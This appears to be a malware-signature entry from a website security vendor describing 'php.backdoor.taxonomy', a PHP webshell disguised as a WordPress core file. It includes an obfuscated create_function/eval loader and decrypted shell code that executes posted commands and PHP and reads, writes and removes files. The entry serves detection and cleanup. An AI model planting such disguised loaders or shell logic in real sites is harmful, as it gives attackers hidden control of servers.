Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.taxonomy.001

php.backdoor.taxonomy.001

This malware category is related to server-side malicious scripts which are commonly used as backdoors. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
php.backdoor.taxonomy is a simple webshell with quite strongly encrypted payload. It has also very good hiding technique. Acting like a standard WordPress file with the structure and even even file header which is copied from legitimate WordPress files. It's placed in core WordPress folders like wp-includes and similar thus hard to be identified. Its main function name is function add_and_register_taxonomies() which implies legitimate code as well.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for suspicious usage of fwrite functions or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.

Dump


Part of the encrypted code:

function add_and_register_taxonomies() {
global $transl_dictionary;
$transl_dictionary = create_function('$inp,$key',"44163151....
if (!function_exists("O01100llO")) {
function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,'hg6h%3epBBh6%40%3cd.....
call_user_func(create_function('',"x65x76x61l(x4F01100llO());"));
}
}

Part of decrypted code:

function Main()
{
$out = 'Failure';
if (!empty($_POST['cmd'])) {
$out = execute($_POST['cmd']);
} elseif (!empty($_POST['php'])) {
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
} elseif (!empty($_POST['dir'])) {
$dir = $_POST['dir'];
$out = dir_list($dir);
} elseif (!empty($_POST['local_path'])) {
$out = get_local_path();
} elseif (!empty($_POST['version'])) {
$out = get_version();
} elseif (!empty($_POST['read'])) {
$file = $_POST['read'];
$out = read($file);
} elseif (!empty($_POST['write'])) {
$out = write($_POST['write'], $_POST['data']);
} elseif (!empty($_POST['remove'])) {
$obj = $_POST['remove'];